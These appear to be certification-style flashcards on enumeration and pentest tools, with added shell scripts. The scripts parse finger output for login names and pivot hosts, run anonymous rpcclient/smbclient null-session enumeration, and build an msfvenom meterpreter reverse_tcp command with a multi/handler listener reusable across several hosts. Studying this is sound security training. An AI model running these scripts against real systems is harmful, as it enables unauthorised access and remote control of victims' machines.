Enumeration tools Flashcards
nbtscan
Scans a subnet for hosts answering NetBIOS name queries (Windows or Samba servers). For each host it displays the IP address, NetBIOS server name, logged-on user and MAC address.
snmpcheck
Displays all the information the SNMP agent at a specified IP address exposes for a given community string (system, network, processes, software and more), so a guessable community string such as public leaks a full host profile.
Metasploit
General-purpose exploitation framework whose predefined auxiliary modules (port, service and version scanners, SMB, SNMP and other enumeration modules) launch several different types of discovery.
Ikeforce
Python script used to identify potential IKE/IPsec VPN servers on a network and enumerate them (group ID enumeration, transform discovery and XAUTH credential brute-forcing).
Dnscat
Ruby program (the dnscat2 server) that tunnels data and command-and-control traffic over DNS queries to get past firewalls that only allow DNS out; the client that runs on the compromised host is written in C.
John the Ripper
Is a password-cracking tool. It works on password hashes rather than live logins, so usernames and hashes are first gathered with other tools and JtR is then run against the hash file.
ad-ldap-enum
Python script that enumerates a Windows Active Directory domain over LDAP (users, groups and group memberships).
finger
Provides information about a user. You can enter:
finger -s username to obtain the specified user's login name, real name, terminal name, write status, idle time, login time, office location, and office phone number.
finger -s to obtain the same short-format information about all users currently logged in to the local system.
finger -l user@host to obtain long-format information about one user on a remote host, or finger @host to list all users logged in to the remote host (the remote host must be running fingerd on port 79, which few systems expose today).
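The listing above is the raw material for the username-then-crack workflow on the John the Ripper card. The following shell script is an added example, not part of the original flashcards: it parses finger -s output into a unique login list and pulls out the hosts the sessions originate from (pivot candidates). The finger output embedded in it is constructed, not captured from a real host, and finger_remote assumes a reachable fingerd.

```shell
#!/bin/sh
# Added example: turn `finger -s` output into a username list and a list of
# session origins. FINGER_SAMPLE is constructed sample output, not real data.
FINGER_SAMPLE='Login      Name              Tty      Idle  Login Time   Office     Office Phone
alice      Alice Liddell     pts/0       3  Dec 12 09:15 (10.0.0.5)
bob        Bob Builder      *pts/1         Dec 12 08:30 (10.0.0.7)
alice      Alice Liddell     pts/2          Dec 12 10:02 (10.0.0.5)
svc_backup Backup Service    pts/3      48  Dec 11 22:10 (10.0.0.9)'

# Query a remote host: `finger @host` lists everyone logged in there,
# `finger -s user@host` asks about one account. Needs fingerd on 79/tcp.
finger_remote() {
    finger "@$1"
}

# Unique login names from finger -s output on stdin. The pattern keeps only
# lines whose first field looks like a Unix login name, which drops the
# "Login ..." header line and messages such as "No one logged on."
finger_users() {
    awk '$1 ~ /^[a-z_][a-z0-9_.-]*$/ { print $1 }' | sort -u
}

# Unique origins of the sessions: the trailing "(host)" column when present.
# Users connect from these hosts, so they are natural next targets.
finger_sources() {
    awk '{ f = $NF; if (f ~ /^\(.*\)$/) { gsub(/[()]/, "", f); print f } }' | sort -u
}

# Demo on the constructed sample.
printf '%s\n' "$FINGER_SAMPLE" | finger_users
printf '%s\n' "$FINGER_SAMPLE" | finger_sources
# With hashes in hand later: john --users=alice,bob,svc_backup hashes.txt
```

Redirect finger_users to a file to get a wordlist of account names; JtR's --users option restricts cracking to exactly those logins once hashes have been obtained.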
NULL session
Is created when no credentials (an empty username and an empty password) are used to connect to the IPC$ share of a Windows system.
A null session is designed to allow clients access to limited types of information across a network.
A null session can be exploited to find information about users, groups, machines, shares, and host SIDs. Modern Windows versions restrict anonymous enumeration by default (the RestrictAnonymous and RestrictAnonymousSAM settings), so this mainly succeeds against legacy or misconfigured hosts.
A hacker can enter:
net use \\hostname\ipc$ "" /user:"" to connect to a system with a null session.
net view \\hostname to display shares available on a system.
net use s: \\hostname\sharename to map one of these shares and view it.
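The same anonymous IPC$ connection can be made from a Linux attack host with Samba's rpcclient and smbclient in place of the Windows net commands. The script below is an added example, not from the flashcards: it runs the null-session queries and parses the enumdomusers user list into account names with decimal RIDs, then separates built-in accounts from created ones. The rpcclient output embedded in it is constructed sample text, and TARGET is an illustrative address.

```shell
#!/bin/sh
# Added example: null-session enumeration with Samba tools. Assumes rpcclient
# and smbclient are installed; TARGET is illustrative, RPC_SAMPLE is constructed.
TARGET="10.0.0.20"

# Anonymous IPC$ connection: -U "" gives an empty username, -N sends no
# password. enumdomusers lists accounts (users); smbclient -L lists shares,
# the equivalent of `net view \\hostname`.
null_session_enum() {
    rpcclient -U "" -N "$1" -c "enumdomusers"
    smbclient -N -L "//$1"
}

# Constructed sample of `rpcclient ... -c enumdomusers` output.
RPC_SAMPLE='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[jdoe] rid:[0x44f]
user:[svc_sql] rid:[0x450]'

# "user:[name] rid:[0xNNN]" on stdin -> "name <rid in decimal>"
parse_enumdomusers() {
    sed -n 's/^user:\[\([^]]*\)\] rid:\[0x\([0-9a-fA-F]*\)\].*/\1 \2/p' |
    while read -r name hex; do
        printf '%s %d\n' "$name" "$((0x$hex))"
    done
}

# Accounts worth trying passwords against: RIDs below 1000 are well-known
# built-ins (500 Administrator, 501 Guest, 502 krbtgt); created accounts
# get RIDs of 1000 and above.
candidate_users() {
    parse_enumdomusers | awk '$2 >= 1000 { print $1 }'
}

# Demo on the constructed sample.
printf '%s\n' "$RPC_SAMPLE" | parse_enumdomusers
printf '%s\n' "$RPC_SAMPLE" | candidate_users
```

Against a live host, pipe null_session_enum "$TARGET" into parse_enumdomusers; an "NT_STATUS_ACCESS_DENIED" from rpcclient means the host restricts anonymous access as described above.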
PsTools
Is a suite of very powerful tools that allow you to manage local and remote Windows systems.
The package includes tools that can change account passwords, suspend processes, measure network performance, dump event log records, kill processes, or view and control services.
SuperScan
Is used to enumerate information from a Windows host. Information gathered can include NetBIOS name table, services, NULL session, trusted domains, MAC addresses, logon sessions, workstation type, account policies, users, and groups.
Metasploit Framework
Is a tool for developing and executing exploit code against a remote target machine. It is part of the Metasploit Project. It can:
Check whether a targeted system can be exploited.
Allow selection of specific exploit code to be used.
Generate a payload in the target system's native executable format and deliver it with the exploit.
Stand-alone exploit payloads are generated with the command:
msfvenom -p payload_type LHOST=ip_or_hostname_of_controlling_host LPORT=port_on_controlling_host -f executable_format -o output_filename
The output file is then uploaded to the target system and executed. The command msfconsole starts the console, where a listener (exploit/multi/handler) configured with the same payload, LHOST and LPORT catches the connection back, and where exploit modules are configured and launched against target hosts.
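A handler that does not match the generated payload is the usual reason a delivered executable never connects back. The script below is an added example, not from the flashcards or the Metasploit project: it builds the msfvenom command line with basic sanity checks on LHOST and LPORT and writes a matching msfconsole resource script for exploit/multi/handler. The payload name, address and port are illustrative.

```shell
#!/bin/sh
# Added example: generate a consistent msfvenom command and multi/handler
# resource script. PAYLOAD, LHOST and LPORT are illustrative values.
PAYLOAD="windows/x64/meterpreter/reverse_tcp"
LHOST="10.0.0.5"
LPORT="4444"

# Print the msfvenom command for payload/LHOST/LPORT/format/output file.
# Rejects an empty LHOST and a non-numeric or out-of-range LPORT, the two
# mistakes that yield an executable that runs but never calls home.
msfvenom_cmd() {
    payload=$1; lhost=$2; lport=$3; fmt=$4; out=$5
    [ -n "$lhost" ] || { echo "LHOST is required" >&2; return 1; }
    case $lport in
        ''|*[!0-9]*) echo "LPORT must be numeric" >&2; return 1 ;;
    esac
    [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || { echo "LPORT out of range" >&2; return 1; }
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$payload" "$lhost" "$lport" "$fmt" "$out"
}

# Resource script for msfconsole: a background handler (-j) that does not
# drop into the session (-z) and keeps listening after the first session
# (ExitOnSession false), so one payload can be reused on several hosts.
handler_rc() {
    printf '%s\n' \
        "use exploit/multi/handler" \
        "set PAYLOAD $1" \
        "set LHOST $2" \
        "set LPORT $3" \
        "set ExitOnSession false" \
        "exploit -j -z"
}

# Demo: the command to run, then the handler script (redirect to handler.rc).
msfvenom_cmd "$PAYLOAD" "$LHOST" "$LPORT" exe payload.exe
handler_rc "$PAYLOAD" "$LHOST" "$LPORT"
```

Start the listener with msfconsole -q -r handler.rc before the payload is executed on the target; because both artifacts come from the same three variables, the payload type, address and port cannot drift apart.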
OpenVAS
Is an open-source vulnerability scanner that was forked from the Nessus codebase when Nessus went closed-source.
Qualys Vulnerability Management assessment tool
It is a cloud-based service that keeps all your data in a private virtual database.
SecurityMetrics Mobile
detects vulnerabilities on mobile devices and gives you a report containing a total risk score, a summary of revealed vulnerabilities, and remediation suggestions
Burp Suite
Web application scanner that looks for common vulnerabilities, like cross-site scripting and SQL injection, and also scans for the OWASP Top 10.
Nikto
Scans web servers for dangerous files and programs, outdated server software, and version-specific vulnerabilities.
OWASP ZAP
web application scanner that is extensible and that evaluates each web application individually
Qualys
Web-based scanner suited to an enterprise-level employer: scan data is encrypted in motion and at rest in the Qualys cloud, and only the scanner appliances (workers) reside on-premises.